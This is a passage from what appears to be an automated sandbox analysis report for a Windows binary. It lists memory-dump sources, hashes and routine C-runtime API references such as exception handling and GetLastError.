                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHeader$ExceptionRaise
                                                                                      • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                      • API String ID: 3685223789-3176238549
                                                                                      • Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                      • Instruction ID: bc35bd008f84f09b104c925d487cb6facf9a6971b89ed0d9413dd0ceb666179d
                                                                                      • Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                      • Instruction Fuzzy Hash: 62015261A19D4AA6EE40EB16EC501786350EFC0764FC45471E64E066F9DFECF928C714
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction ID: 51a07d2670193f30fdf77a6b3df9b0849c16a08b4fc514a6daec13f5d6cca019
                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction Fuzzy Hash: 2E116032609B8182EB619F25F440259B7E4FB88B98F584230DF9D1B798DF3CD551CB40
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                       • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                      • String ID: :
                                                                                      • API String ID: 2595371189-336475711
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126CF45A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                       • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate
                                                                                      • String ID: csm$f
                                                                                      • API String ID: 661698970-629598281
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFE126C6CE9,?,?,?,?,00007FFE126D0582,?,?,?,?,?), ref: 00007FFE126C6E83
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFE126C6CE9,?,?,?,?,00007FFE126D0582,?,?,?,?,?), ref: 00007FFE126C6F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                       • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                       • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0